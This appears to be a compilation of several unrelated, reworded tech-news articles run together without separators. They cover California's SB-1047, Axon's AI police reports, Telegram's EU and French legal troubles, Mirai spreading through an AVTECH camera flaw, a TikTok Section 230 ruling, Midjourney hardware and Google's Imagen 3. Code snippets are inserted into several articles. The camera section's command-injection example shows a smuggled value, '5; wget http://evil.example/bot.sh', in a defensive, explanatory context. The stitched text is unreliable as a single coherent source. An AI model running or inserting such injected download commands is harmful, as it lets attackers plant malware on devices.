Source: Ars Technica

Critics Call on Governor to Reject Disputed California AI Safety Legislation After It Secures Legislative Endorsement

## California’s AI Safety Bill: A Crucial Turning Point for AI Oversight

### Introduction

California stands poised to enact a transformative law that may establish a benchmark for artificial intelligence (AI) oversight throughout the United States. Senate Bill 1047 (SB-1047), which has gained substantial backing in both the California State Assembly and Senate, is now pending Governor Gavin Newsom’s approval. Sponsored by State Senator Scott Wiener, this legislation seeks to impose rigorous safety standards for large AI models that could introduce new risks to public safety and security. Nevertheless, the bill has ignited a fervent debate, with advocates and opponents presenting fundamentally opposing perspectives on its possible effects.

### The Essence of SB-1047

At its core, SB-1047 requires developers of large AI models (those with training costs exceeding $100 million) to implement a "kill switch." This capability would allow the swift deactivation of an AI system that begins to display behaviors threatening public safety, particularly when it operates with limited human supervision. By targeting only the largest models, the bill aims to avoid burdening smaller startups, which may lack the resources to meet such stringent requirements.
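SB-1047 does not prescribe how a shutdown capability must be built. As a purely conceptual sketch (all names here are hypothetical, not anything from the bill), one common engineering pattern is a thread-safe flag that every serving path checks before running inference:

```python
import threading

class KillSwitch:
    """Conceptual operator control for halting a deployed model."""

    def __init__(self):
        self._halted = threading.Event()

    def engage(self):
        # Thread-safe; visible to every serving thread immediately.
        self._halted.set()

    @property
    def engaged(self):
        return self._halted.is_set()

def serve_request(switch, prompt):
    # Every request path checks the switch before any inference runs.
    if switch.engaged:
        raise RuntimeError("model halted by operator")
    return f"model output for: {prompt}"  # stand-in for real inference

switch = KillSwitch()
print(serve_request(switch, "hello"))  # model output for: hello
switch.engage()  # after this, serve_request refuses all requests
```

The design choice worth noting is that the check lives in the request path itself, so no separate monitoring process has to race the model to shut it down.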

Supporters of the bill contend that it is a vital stride toward the responsible advancement of AI technologies. They highlight the swift growth in AI capabilities and the risk of these systems behaving in unpredictable and potentially perilous manners. Geoffrey Hinton and Yoshua Bengio, two prominent figures in the AI domain, have expressed their endorsement of the bill, stressing the importance of external oversight to safeguard public welfare.

### The Dispute: Safety Versus Innovation

Regardless of its good intentions, SB-1047 has encountered notable opposition from various stakeholders. One prominent critic is Fei-Fei Li, a Stanford University computer science professor and distinguished AI authority. In a recent opinion piece, Li asserted that, although the bill is well-intentioned, it risks causing unintended consequences that could hinder innovation not only in California but nationwide. She voiced apprehensions that the bill’s assignment of liability to original developers of altered AI models might deter open-source collaboration, which is essential for academic inquiry and the wider AI community.

Li’s concerns are echoed by a coalition of California business executives who have petitioned Governor Newsom to reject the bill. In an open letter, they argued that SB-1047 wrongly focuses on regulating model development rather than addressing the misuse of AI technologies. They cautioned that the bill could impose hefty compliance costs and create regulatory confusion, potentially discouraging investment and innovation within the state.

### Governor Newsom’s Predicament

Governor Gavin Newsom now confronts a challenging choice. On one hand, the considerable legislative backing for SB-1047 indicates strong political momentum to pass the bill. Should Newsom opt for a veto, the legislature might be able to override his decision with a two-thirds majority in both chambers—a plausible scenario given the current support for the measure.

Conversely, Newsom has voiced concerns about over-regulating the AI sector. At a symposium at UC Berkeley in May, he warned that overregulation could put California in a "dangerous position." Nonetheless, he also acknowledged the extraordinary circumstances surrounding AI, where even the technology's creators are calling for regulation. "When you have the inventors of this technology, the godmothers and fathers, saying, 'Help, you need to regulate us,' that's a very different environment," Newsom remarked.

### The Broader Consequences

The result of SB-1047 could have extensive ramifications, not just for California but for the entire AI landscape in the United States and beyond. If the bill is enacted, it might serve as an example for other states and potentially even inform federal regulations. It would also indicate a transition towards more proactive management of AI technologies, concentrating on preemptive actions rather than reactive responses.

Conversely, if the bill is vetoed, it could postpone the establishment of AI safety regulations and leave room for ongoing discussions on how best to balance innovation with public safety. This decision will also likely affect how other states address AI oversight, either motivating them to emulate California’s approach or to take a more cautious stance.

### Conclusion

As the deadline for Governor Newsom’s decision nears, all eyes are focused on California. SB-1047 marks a pivotal moment in the continued discourse surrounding AI regulation, with substantial consequences for the future of AI development. Whether the bill is enacted or vetoed, the dialogue it has ignited will undoubtedly persist, influencing the path of AI governance in the years that lie ahead.

Expert Cautions Chatbots May Allow Police to Alter Reports

### The Surge of AI in Law Enforcement: A Double-Edged Sword?

In recent years, the integration of artificial intelligence (AI) into many fields has drawn both praise and scrutiny, and law enforcement is no exception. The emergence of AI-driven tools like Axon's Draft One, which produces police reports from body camera recordings, has ignited an intense debate about the future of policing and the justice system. While the technology promises to save officers time and boost productivity, it also raises serious concerns about accuracy, bias, and the risk of misuse.

#### The Potential of AI in Law Enforcement

Draft One, created by Axon—a firm recognized for its tasers and body cameras—marks a notable advancement in policing technology. This tool, powered by OpenAI’s GPT-4 model, can craft comprehensive police reports within minutes following an incident, relying solely on audio captured from body cameras. This feature is particularly enticing to police agencies, where officers typically invest hours in report writing—a duty many perceive as onerous.
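Axon has not published Draft One's internals, but the description above implies a two-stage pipeline: transcribe the body-camera audio, then prompt a language model to draft the report from the transcript. A minimal illustrative sketch of that shape, with the transcription step stubbed out and every name and string hypothetical:

```python
def transcribe_bodycam_audio(audio_path):
    # Stand-in for an automatic speech recognition step; a real system
    # would run an ASR model over the recording at `audio_path`.
    return "Officer responded to a noise complaint at 14:02. No arrests made."

def build_report_prompt(transcript):
    # The report draft comes from prompting a language model with the
    # transcript plus instructions to stay strictly within it.
    return (
        "Write a factual incident report using only the transcript below. "
        "Do not add details that are not in the transcript.\n\n"
        f"Transcript:\n{transcript}"
    )

prompt = build_report_prompt(transcribe_bodycam_audio("shift_0412.wav"))
print(prompt.splitlines()[0])
```

The instruction to use "only the transcript" illustrates the kind of prompt-level constraint a vendor would need; whether Axon does exactly this is not public.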

In June 2024, the police department in Frederick, Colorado, became the first in the world to adopt Draft One. The department reported that the tool significantly reduced the time officers spent on paperwork, letting them focus more on their core duties. Other departments across the United States quickly followed suit, eager to reap the benefits of the technology.

Axon has positioned Draft One as a transformative tool that can "accelerate justice" by eliminating the need for manual data entry. The firm asserts that its AI-generated reports are as accurate as, if not more accurate than, those written by humans. In a double-blind evaluation, Axon found that Draft One's reports were equal or superior to human-written reports in completeness, neutrality, objectivity, terminology, and coherence.

#### The Dangers and Issues

Notwithstanding the evident advantages, the rollout of AI-generated police reports has triggered concerns among legal professionals, civil rights proponents, and digital rights organizations. The primary apprehension involves the capacity for AI to incorporate errors, biases, or even intentional inaccuracies into police reports—documents that are essential to the justice framework.

One of the major dangers is the chance of AI “hallucinations,” where the system fabricates information that is inaccurate or unrelated to the incident. While Axon has asserted that it has mitigated such errors by “dialing down the creativity” of Draft One, the risk lingers. AI systems, including those based on GPT-4, are recognized for occasionally producing erroneous or misleading data, particularly when navigating intricate or nuanced contexts.
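Axon has not said exactly what "dialing down the creativity" means in practice, but for GPT-style models the phrase usually refers to lowering the sampling temperature, which sharpens the next-token distribution toward the most probable choice. A self-contained sketch of temperature-scaled sampling, using made-up logits:

```python
import math
import random

def sample_with_temperature(logits, temperature, seed=0):
    """Sample an index from `logits` after dividing them by `temperature`."""
    rng = random.Random(seed)
    scaled = [l / temperature for l in logits]
    # Numerically stable softmax over the scaled logits.
    m = max(scaled)
    exps = [math.exp(s - m) for s in scaled]
    total = sum(exps)
    probs = [e / total for e in exps]
    # Draw from the resulting categorical distribution.
    r = rng.random()
    acc = 0.0
    for i, p in enumerate(probs):
        acc += p
        if r <= acc:
            return i
    return len(probs) - 1

# At a very low temperature the most likely token wins essentially always.
print(sample_with_temperature([1.0, 5.0, 2.0], temperature=0.1))  # 1
```

Lower temperature reduces variability (and thus fabricated flourishes) but does not, by itself, make the underlying model factually correct, which is why the hallucination risk "lingers."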

Furthermore, reliance on AI-generated reports could exacerbate pre-existing biases in policing. Body camera footage, which documents events from the officer’s viewpoint, already possesses the potential to skew the narrative in favor of law enforcement. If AI systems are trained on biased datasets or are affected by how officers articulate their observations, they could reinforce these biases, culminating in unjust results.

Legal scholars such as Andrew Ferguson have cautioned that AI-generated reports could “digitally contaminate” the evidence-based evolution of criminal proceedings. The apprehension is that AI might subtly modify the narrative in manners that skew police perspectives or mislead judicial entities. This could have expansive implications, especially in instances where the police report constitutes the principal piece of evidence.

#### The Risk of Misapplication

Another issue is the potential for the misuse of AI-generated reports. As the technology gains traction, there exists a risk that officers may employ it to manipulate the portrayal of an incident. For instance, an officer could consciously phrase their comments to sway the AI’s interpretation, leading to a report that favors the officer’s rendition of events, even if it lacks total accuracy.

This concern is heightened by the reality that AI-generated reports might be utilized in more serious scenarios, despite initial advisories to restrict their application to minor occurrences. In some jurisdictions, officers have already begun applying Draft One to a wider array of cases, raising alarms regarding the accuracy and dependability of the reports in more intricate situations.

Civil rights advocates are apprehensive that the extensive integration of AI-generated reports could lead to heightened police scrutiny, particularly in marginalized populations. If the technology simplifies the reporting process for officers, they may become more prone to pursue charges in circumstances where they might have earlier decided to dismiss the matter.

#### The Call for Transparency and Oversight

In light of the potential dangers, experts are advocating for enhanced transparency and oversight concerning the usage of AI-generated police reports. Ferguson has suggested that any implementation of this technology in legal contexts should be accompanied by thorough documentation regarding how AI models were developed, what data they utilized, and how the models were assessed. Such transparency is vital for ensuring that the reports are both accurate and trustworthy.

Additionally, there is an essential need for independent evaluation and auditing of AI-generated reports. Civil rights organizations like the Electronic Frontier Foundation (EFF) have urged police agencies to grant access to these reports for further examination. This would enable impartial experts to evaluate the precision and equitability of the AI-generated reports.

EU Probes If Telegram Downplayed User Figures to Avoid Regulation

### Telegram under EU Examination: An In-Depth Analysis of the Ongoing Probe

Telegram, the well-known messaging platform renowned for its encrypted communication features, is presently undergoing scrutiny by the European Union (EU) for potential violations of the Digital Services Act (DSA). The investigation focuses on whether Telegram has accurately reported its user figures within the EU, a vital aspect that influences the level of regulatory scrutiny the platform must meet.

#### The Heart of the Inquiry

The EU’s apprehensions arise from doubts that Telegram might have downplayed its user count in the area to avoid surpassing the 45 million user benchmark. Platforms that exceed this threshold are categorized as “very large online platforms” (VLOPs) under the DSA, which subjects them to stricter regulations. These regulations encompass improved content moderation, independent audits, and necessary data sharing with the European Commission.

As of February 2024, Telegram claimed to have 41 million users in the EU. However, it did not furnish an updated count as mandated by the DSA, instead indicating that it had “significantly fewer than 45 million average monthly active users in the EU.” This lack of clarity has led the EU to commence a technical investigation to ascertain the true number of Telegram users in the area.

#### Consequences of Being Designated a VLOP

Should Telegram be found to exceed 45 million users in the EU, it would be categorized as a VLOP, resulting in a range of additional responsibilities. These responsibilities include:

– **Content Moderation:** Telegram would be required to establish more effective systems for monitoring and removing illicit content, including misinformation and propaganda.
– **Data Sharing:** The platform would need to share more information with the European Commission, ensuring adherence to EU regulations.
– **Independent Audits:** Routine assessments by external organizations would become obligatory to confirm that Telegram complies with the DSA’s stipulations.
– **Advertising Restrictions:** The platform would be barred from targeting advertisements based on sensitive user information such as religion, gender, or sexual orientation.

These measures form part of the EU’s wider initiative to limit the dominance of large online platforms and ensure they function in a way that safeguards user rights and public safety.

#### Telegram’s Global Popularity and Challenges

In recent years, Telegram has experienced a significant rise in popularity, boasting a global user base approaching 1 billion. The app is especially favored for its encrypted messaging capabilities, offering enhanced privacy compared to other services. Nevertheless, this same aspect has rendered Telegram a hotspot for illegal activities, prompting investigations in various countries, including France.

Concurrently, French authorities are investigating Telegram over alleged criminal activity facilitated through the platform, an inquiry that led to the arrest of its founder, Pavel Durov, a Russian-born billionaire who has since acquired French and Emirati citizenship. Durov, who left Russia in 2014 after refusing Moscow's demands for access to Ukrainian users' data, denies any wrongdoing, asserting that he has "nothing to hide."

#### The EU’s Future Actions

The EU’s Joint Research Centre, its internal data and science body, is currently conducting a technical probe to ascertain the validity of Telegram’s user statistics. Thomas Regnier, a spokesperson for digital affairs at the European Commission, stated that the EU possesses its own systems and analyses to confirm user data. If Telegram is found to have provided misleading information, the EU could independently classify it as a VLOP based on its findings.

The DSA regulations for VLOPs came into effect a year ago, affecting some of the world’s most significant online platforms, including Instagram, Google, and TikTok. These enterprises have needed to significantly enhance their compliance initiatives, employing thousands to meet the DSA’s rigorous demands. Some platforms have even pursued legal action against the EU, contending that the regulations are excessively demanding.

#### Final Thoughts

The ongoing inquiry into Telegram’s adherence to the DSA marks an important milestone in the EU’s strategy to regulate large online platforms. If it is determined that Telegram has more than 45 million users in the EU, it will encounter a range of new responsibilities aimed at promoting greater transparency, accountability, and user protection. As the investigation progresses, it will be essential to observe how Telegram reacts and whether it can fulfill the EU’s rigorous regulatory standards.

This situation also underscores the broader challenges facing global tech firms as they navigate increasingly intricate regulatory environments. With the EU at the forefront of digital regulation, other regions may follow suit soon, making compliance a paramount concern for platforms such as Telegram operating on a worldwide scale.

Critical 0-Day Flaw in Surveillance Cameras Leveraged to Introduce Mirai Malware

### Major Flaw in AVTECH Security Cameras Used to Distribute Mirai Malware

In a troubling turn of events for online security, cybercriminals have been taking advantage of a serious flaw in a popular security camera model, the AVM1203 from the Taiwan-based firm AVTECH, to distribute the infamous Mirai malware. This malware is notorious for transforming compromised Internet of Things (IoT) devices into botnets capable of executing large-scale distributed denial-of-service (DDoS) attacks. The flaw, designated CVE-2024-7029, has been actively exploited since March, according to network security firm Akamai.

#### The Flaw: A Five-Year-Old Vulnerability

The AVM1203 surveillance camera, which AVTECH no longer sells or supports, contains a vulnerability that has been publicly known since at least 2019 but was never patched. The flaw lies in the `brightness` argument of the `action=` parameter in the camera's firmware, specifically in the file `/cgi-bin/supervisor/Factory.cgi`. It permits command injection, allowing attackers to run malicious code remotely on compromised devices.
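Akamai identifies the flaw class as command injection; the sketch below is illustrative only, not AVTECH's actual firmware code, and `camera_ctl` is an invented command name. It contrasts the unsafe pattern (splicing a request parameter into a shell command string) with strict validation plus argument-list execution:

```python
def set_brightness_unsafe(value):
    # Vulnerable pattern: the request parameter is spliced into a shell
    # command string, so a value like "5; wget http://evil.example/bot.sh"
    # smuggles an extra command past the intended one.
    return "camera_ctl --brightness " + value  # imagine this fed to a shell

def set_brightness_safe(value):
    # Defense: validate against the narrow set of legal inputs first...
    if not value.isdigit() or not 0 <= int(value) <= 100:
        raise ValueError("invalid brightness value")
    # ...and build an argument list, which no shell ever interprets.
    return ["camera_ctl", "--brightness", value]

print(set_brightness_safe("50"))  # ['camera_ctl', '--brightness', '50']
```

The argument-list form matters as much as the validation: even if a strange value slipped through, it would reach the program as a single literal argument rather than as shell syntax.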

Even though the flaw has been publicly recognized for several years, it wasn’t formally designated until recently with the CVE-2024-7029 identifier. The lack of ongoing support for the camera means that no security updates are provided, forcing users to consider replacing the device to lessen the threat.

#### The Mirai Botnet: An Ongoing Danger

Mirai malware first gained notoriety in September 2016 when a botnet consisting of compromised IoT devices executed a massive DDoS attack that incapacitated the cybersecurity news site Krebs on Security. The botnet, made up of infected webcams, routers, and other IoT devices, could launch DDoS attacks of unprecedented magnitude. In the weeks that followed, Mirai was utilized to assault Internet service providers and other prominent organizations, such as a significant attack on dynamic domain name provider Dyn, leading to widespread disruptions of online services.

The scenario escalated when the creators of Mirai made its source code publicly available, enabling nearly anyone to develop their own botnets using the malware. This decision resulted in a surge of Mirai variants, each able to carry out destructive DDoS attacks.

#### Recent Exploits and Insights

Akamai’s Security Intelligence and Response Team (SIRT) has been actively tracking the recent exploitation of the AVM1203 flaw. By employing a “honeypot”—a network of devices designed to replicate the vulnerable cameras—Akamai has been able to witness the attacks live. However, the honeypot configuration does not provide a precise estimate of the botnet’s scale.

The attackers have exploited the vulnerability to deploy a version of the Mirai malware, specifically the Corona Mirai variant, which has been associated with other attacks since 2020. The malware propagates by connecting to numerous hosts via Telnet on ports 23, 2323, and 37215. Once executed, the malware displays the string “Corona” on the console of an infected device, indicating this specific variant.
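Because this variant spreads over Telnet, one quick defensive check for a device you administer is to probe those three ports with the standard library. A minimal sketch (scan only hosts you own or manage):

```python
import socket

MIRAI_TELNET_PORTS = [23, 2323, 37215]  # ports probed by this Mirai variant

def port_open(host, port, timeout=1.0):
    # A successful TCP connect means something is listening on that port.
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def exposed_telnet_ports(host):
    """Return which Mirai-probed ports are reachable on `host`."""
    return [p for p in MIRAI_TELNET_PORTS if port_open(host, p)]

print(exposed_telnet_ports("127.0.0.1"))
```

Any port that shows up open on an IoT device's WAN side is worth closing or firewalling, since Mirai variants find victims by exactly this kind of sweep.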

#### Wider Implications and Recommendations

The exploitation of this flaw underscores the ongoing dangers posed by unsupported and unpatched IoT devices. The AVM1203 camera exemplifies how outdated technology can serve as a conduit for widespread cyberattacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also released alerts regarding this vulnerability, urging heightened awareness in securing IoT devices.

For anyone still using the AVM1203 or similar unsupported devices, the most advisable step is to replace them with secure, modern alternatives. It is also crucial to ensure that no IoT device remains accessible with default credentials, a frequent entry point for attackers.

#### Conclusion

The exploitation of the AVM1203 vulnerability to disseminate Mirai malware highlights the critical need for keeping security measures current for all Internet-connected devices. As IoT devices become increasingly woven into our everyday lives, the urgency for strong cybersecurity practices continues to rise. Users must stay alert, ensuring that their devices are secure and supported, to avoid becoming unintentional participants in the next significant cyberattack.

Telegram’s CEO Confronts Several Criminal Allegations and Travel Restrictions in France

**Telegram CEO Pavel Durov Indicted in France: An In-Depth Look at the Allegations and Consequences**

Pavel Durov, the intriguing CEO and co-founder of Telegram, is now embroiled in a legal controversy in France. The tech mogul, renowned for his passionate defense of privacy and freedom of expression, has been indicted on numerous serious allegations, including complicity in unlawful transactions, refusal to assist law enforcement, and breaches of cryptology regulations. This piece explores the intricacies of the accusations, the wider ramifications for Telegram, and what this implies for the future of encrypted communication platforms.

### The Allegations: An Analysis

#### 1. **Complicity in Unlawful Transactions**

A key accusation against Durov involves complicity in “web-mastering an online platform to facilitate an illegal transaction within an organized group.” This allegation, which could result in a maximum sentence of 10 years in prison and a fine of 500,000 euros, arises from claims that Telegram has been utilized to enable unlawful activities, such as drug trafficking and the dissemination of child pornography.

Paris prosecutor Laure Beccuau stated that Telegram’s purported unwillingness to work with law enforcement has intensified these issues. The platform’s near-total lack of engagement with requests for support in criminal inquiries—especially those related to child exploitation, drug offenses, and online hate—has culminated in the present legal action.

#### 2. **Refusal to Assist Law Enforcement**

Another critical accusation concerns Telegram’s unwillingness to provide information or documents needed for lawful monitoring. French officials have long expressed dissatisfaction with Telegram’s hesitance to aid in criminal investigations, particularly in serious cases. This charge underscores the ongoing friction between tech firms emphasizing user privacy and governments aiming to uphold legal standards.

#### 3. **Cryptology-Related Breaches**

Durov is also facing several charges tied to offering cryptology services without notifying French authorities as required. French legislation mandates that providers of cryptology services must inform the National Cybersecurity Agency of France (ANSSI) about their activities. Such declarations are vital for enabling governmental oversight and regulation of cryptographic tools that ensure confidentiality.

The specific allegations include:
– Providing cryptology services without a certified declaration.
– Offering a cryptology tool that guarantees confidentiality without prior declaration.
– Importing a cryptology tool that assures authentication or integrity verification without prior declaration.

These allegations emphasize the intricate legal framework surrounding encryption and the complications that arise as tech companies operate in diverse regulatory landscapes.

### The Wider Implications for Telegram

Telegram, known for its blend of private messaging and social networking features, has traditionally been a favored platform among users who prioritize privacy. Although its messages are not end-to-end encrypted by default, users can activate this feature for individual chats. This versatility has attracted a broad range of users, from privacy advocates to individuals engaged in questionable activities.

The charges against Durov prompt crucial inquiries regarding the accountability of platform owners for their users’ actions. In a statement responding to the indictment, Telegram claimed it complies with legal and industry standards for moderation. The company described it as “absurd to assert that a platform or its owner is liable for abuses occurring on that platform.”

Nevertheless, the legal proceedings in France imply that officials are increasingly disinclined to accept this defense. As governments globally tackle the challenges presented by encrypted communication platforms, the resolution of Durov’s case could establish a significant legal precedent.

### The Future of Encrypted Communication

The accusations against Pavel Durov and the heightened scrutiny of Telegram reveal the escalating conflict between privacy and security in today’s digital landscape. As more individuals gravitate towards encrypted communication platforms to safeguard their privacy, governments struggle to reconcile the imperative for security with individuals’ rights to communicate freely and privately.

The outcome of this case may hold profound implications for the future of encrypted communication. If Durov is convicted, it could encourage other governments to pursue similar actions against tech firms that resist cooperating with law enforcement. Conversely, a dismissal of the charges could bolster the position of privacy advocates who contend that individuals possess the right to communicate free from government oversight.

### Conclusion

Pavel Durov’s indictment in France signifies a critical juncture in the ongoing dialogue surrounding privacy, security, and the involvement of tech companies in contemporary society. As the case develops, it will be closely monitored by privacy advocates, law enforcement bodies, and tech firms alike. The result could influence the future landscape of encrypted communication and establish essential legal precedents regarding governmental regulation of digital platforms.

For now, Durov remains in France, prohibited from leaving and required to report to authorities twice weekly. As the legal proceedings advance, the world will observe how this high-stakes conflict between privacy and security evolves.

Court Decides Section 230 Offers No Protection to TikTok in Lawsuit Regarding Death from Blackout Challenge

### Appeals Court Revives Lawsuit Against TikTok Over Child’s Death in “Blackout Challenge”

In a noteworthy legal turn, an appeals court has reinstated a lawsuit against TikTok, overturning a previous ruling from a lower court that had conferred immunity upon the social media giant under Section 230 of the Communications Decency Act. This case revolves around the heartbreaking death of a child who engaged in the perilous “Blackout Challenge,” a viral phenomenon that prompted users to choke themselves until they lost consciousness.

#### Background: The “Blackout Challenge” and Section 230

The “Blackout Challenge” represents a troubling trend that has emerged on various social media platforms, TikTok included. This challenge requires users to choke themselves with objects like belts or cords until they become unconscious. Tragically, multiple children have died while attempting this challenge, triggering numerous lawsuits against TikTok.

In 2022, Tawainna Anderson, mother of Nylah Anderson, one of the victims, filed a lawsuit against TikTok. The complaint alleged that TikTok's algorithm pushed the hazardous challenge to Nylah, contributing to her death. The lower court, however, dismissed the case, citing Section 230, which typically shields online platforms from liability for third-party content.

#### The Appeals Court’s Ruling

In a recent decision, Third Circuit Judge Patty Shwartz overturned the previous ruling, asserting that Section 230 does not offer absolute immunity to TikTok in this instance. Judge Shwartz noted that TikTok’s algorithm does more than merely host third-party content; it actively curates and endorses certain videos for users, rendering it an “expressive product” of the platform itself.

Shwartz referenced a recent Supreme Court decision that highlighted the difference between third-party speech and a platform’s own “expressive activity.” According to this ruling, if a platform’s algorithm embodies editorial choices regarding the content it supports, that action could be classified as the platform’s own speech, which Section 230 does not shield.

The appeals court has remanded the case to the district court, which will take up Anderson's remaining claims and determine which of them are precluded by Section 230, in line with the Third Circuit's judgment.

#### Implications for TikTok and Other Social Media Platforms

This ruling may have significant repercussions for TikTok and various other social media platforms that depend on algorithms to curate and highlight content. Should the courts ultimately deem TikTok accountable for endorsing harmful content through its algorithm, it could pave the way for an increase in lawsuits against social media companies, especially concerning child safety.

Circuit Judge Paul Matey, who partially agreed with the ruling, stressed that Section 230 should not be interpreted so expansively as to enable companies like TikTok to disregard the hazards associated with the content they promote. Matey advocated for a “far narrower” interpretation of Section 230, one that would hold platforms responsible for knowingly disseminating harmful content.

Matey also remarked that by the time Nylah Anderson engaged in the “Blackout Challenge,” TikTok had already recognized the risks linked to the trend but failed to take sufficient measures to curb its proliferation. He contended that TikTok should be liable for its targeted promotion of harmful content, especially when it pertains to the safety of children.

#### The Ongoing Legal Battle

Anderson’s legal team has pledged to persist in seeking justice, contending that the Communications Decency Act was never meant to permit social media companies to gain from endorsing dangerous content aimed at children. They have expressed optimism that the revived lawsuit will result in enhanced protections for minors on social media platforms.

TikTok, for its part, has earlier declared its commitment to user safety and has promised to “remain vigilant” in eliminating harmful content, including the “Blackout Challenge.” Nevertheless, the company has yet to respond to the latest ruling.

As the case progresses, it will attract considerable attention from legal professionals, social media enterprises, and concerned parents. The outcome could establish a precedent for how courts understand Section 230 in relation to algorithm-driven content promotion, potentially altering the legal framework for online platforms.

Midjourney AI Firm Teases New Hardware Release Featuring Unique Form Factor

### Midjourney’s Enigmatic Hardware Initiative: A Preview of the AI Device Future

Midjourney, celebrated for its state-of-the-art AI image-creation tool, has recently generated buzz in the tech arena with an unforeseen announcement: it is embarking on a hardware journey. Initially recognized for its software expertise, the firm is now assembling a team to investigate the potential of AI-integrated devices. This development has stirred intrigue and speculation, particularly in light of the ambiguous clues and witty hints from Midjourney’s founder, David Holz.

#### Transitioning from Software to Hardware

This revelation was shared through Midjourney’s official X (formerly Twitter) handle, where the company urged applicants to seek positions within its newly established hardware division. This signifies a prominent change for Midjourney, previously synonymous with its AI image-generation prowess. The choice to expand into hardware is captivating, especially considering Holz’s history.

David Holz is well-acquainted with the hardware domain. Prior to establishing Midjourney, he served as the CTO at Leap Motion, a firm recognized for its pioneering hand-tracking innovation. His credentials in hardware are further enhanced by the recent addition of Ahmad Abbas, who held a hardware management role at Apple for the Vision Pro headset. Abbas now occupies the position of “Head of Hardware” at Midjourney, reinforcing the company’s commitment to its new direction.

#### The Orb: A Playful Suggestion or a Serious Concept?

While the particulars of Midjourney’s hardware are still under wraps, the company has been sharing hints that have ignited speculation. One captivating clue emerged from a tweet by Holz, who humorously responded to a meme portraying a wizard with an orb from the I.C.E. book *Middle-earth: Valar and Maiar*. Holz remarked that the new hardware form factor “might be an orb,” a statement that has since attracted considerable interest.

The notion of an orb as a hardware device is not entirely implausible, especially regarding AI. In fantasy narratives, orbs such as the palantírs in *The Lord of the Rings* are mystical entities that enable users to observe remote occurrences or communicate over long distances. Adapting this idea to reality, an AI-powered orb could feasibly function as a cutting-edge communication or visualization tool, utilizing advanced AI to offer users distinctive interactive experiences.

Nonetheless, it’s essential to recognize that both Midjourney and Holz are known for playful and enigmatic engagement on social platforms. While the orb idea is intriguing, it may well be more of a fanciful concept than a definitive product strategy. Yet the prospect of an orb-like gadget has captured many imaginations and isn’t entirely beyond reach, given Midjourney’s inventive approach to technology.

#### What Might Midjourney’s Hardware Entail?

Aside from the orb conjecture, Midjourney has been reticent about its hardware aspirations. The company has suggested that it has “multiple efforts in flight” and that there are “definitely opportunities for more form factors.” This indicates that Midjourney is investigating various options, possibly encompassing wearable devices, smart home technologies, or even entirely new genres of AI-driven hardware.

One thing is unequivocal: Midjourney aims to stand out from the pack. The company has clearly stated that its device “is not gonna be a pendant,” distancing itself from the current trend of pendant-like AI gadgets that have struggled to resonate. Instead, Midjourney appears to be striving for something more innovative and distinct, although what that may be remains to be discovered.

#### The Larger Perspective: AI-Driven Hardware

Midjourney’s dive into hardware forms part of a wider trend in the tech sector, where firms are increasingly investigating the convergence of AI with tangible devices. As AI continues to evolve, the potential for crafting intelligent, responsive hardware that can engage with users in novel and meaningful ways becomes increasingly evident.

Midjourney’s venture into this domain is especially compelling given its foundation in AI-powered creativity. The company’s image-generation tool has already showcased the capacity of AI to enhance human creativity, and it’s conceivable that its hardware could expand on this base, providing users with innovative methods to interact with AI in their everyday lives.

#### Conclusion: A Fresh Chapter for Midjourney

Although specifics about Midjourney’s hardware ambitions remain limited, the company’s declaration has undoubtedly captured the attention of the tech community. With David Holz’s expertise in hardware and a team that includes former Apple talent, Midjourney is primed to make a substantial mark in the AI-driven hardware landscape.

Whether the end product takes the form of an orb, a wearable, or something entirely unforeseen, one certainty remains: Midjourney is redefining the boundaries of AI’s capabilities, both in software and now in hardware.

Read More
Google AI Restarts Human Image Creation After Worries About Historical Precision

### Google’s Gemini AI Model Revives Human Image Creation with Enhanced Protections

Google’s Gemini AI model, particularly the Imagen 3 framework, has reinstated its capability to produce human images after a brief hiatus earlier this year. This suspension, initiated in February, resulted from considerable backlash regarding the generation of historically inaccurate and racially insensitive visuals. The revised Imagen 3 is now accessible to Gemini Advanced, Business, and Enterprise users, with a public variant obtainable through the Gemini Labs testing platform.

#### Background: The Suspension and the Dispute

The initial halt in human image generation within Google’s AI frameworks was prompted by extensive criticism. Users and specialists noted that the AI frequently created racially diverse representations in scenarios where historical accuracy was warranted. For instance, when tasked with generating images of historical figures such as British monarchs or 15th-century explorers, the AI occasionally depicted individuals of various ethnic backgrounds, inviting accusations of historical distortion.

This dispute underscored the difficulties of reconciling inclusivity with factual accuracy in AI-generated materials. Consequently, Google opted to pause this feature and reassess its methodology to prevent the AI from propagating misleading or offensive imagery.

#### The Comeback of Human Image Generation

In August 2024, Google revealed the revival of human image generation within its Imagen 3 model. This re-launch includes a series of new safeguards aimed at curbing the production of contentious or unsuitable images. Per an announcement in Google’s blog, the updated model refrains from generating “photorealistic, identifiable individuals, representations of minors, or excessively gory, violent, or explicit scenes.”

Additionally, the AI imposes limitations on generating visuals of notable figures. For example, a request for “President Biden playing basketball” would be denied, while a broader prompt like “a US president playing basketball” would be permissible. This strategy seeks to avert the creation of images that could be misconstrued or misused in misleading ways.
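Google has not published its filtering logic, but the policy described above — rejecting prompts that name identifiable public figures while allowing generic, role-based phrasings — can be sketched as a simple pre-generation check. The blocklist and function here are purely hypothetical illustrations, not Google's implementation:

```python
# Hypothetical sketch of a pre-generation prompt filter like the one
# described: prompts naming identifiable public figures are rejected,
# while generic role-based prompts pass through.

# Illustrative blocklist; a real system would presumably use a much
# larger, regularly updated registry of identifiable individuals.
BLOCKED_NAMES = {"joe biden", "president biden", "donald trump"}

def is_prompt_allowed(prompt: str) -> bool:
    """Return False if the prompt names a blocked public figure."""
    lowered = prompt.lower()
    return not any(name in lowered for name in BLOCKED_NAMES)

print(is_prompt_allowed("President Biden playing basketball"))  # False
print(is_prompt_allowed("a US president playing basketball"))   # True
```

A substring check like this is only the crudest possible approximation; production systems combine such lists with learned classifiers that also catch misspellings and descriptions that identify a person without naming them.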

#### Enhanced Accuracy and Historical Representation

Tests performed by Ars Technica demonstrated that the new Imagen 3 system has made considerable strides in sidestepping the issues that necessitated the earlier suspension. For instance, when prompted for a “historically accurate depiction of a British king,” the AI now yields images of bearded white men in red garments, more accurately reflecting historical data.

The updated model also shows greater caution in its outputs. Requests for images that might lead to contentious or historically delicate representations, such as “a 1943 German soldier” or “a women’s suffrage leader delivering a speech,” now result in error messages guiding users to consider alternative prompts.

#### Persistent Challenges and Future Enhancements

Despite these advancements, Google recognizes that the system is not flawless. The company has pledged to perpetually enhance the model based on user input. “Naturally, as with any generative AI tool, not every image created by Gemini will be flawless, but we will continue to heed feedback from early users while we strive for improvement,” Google mentioned in its blog.

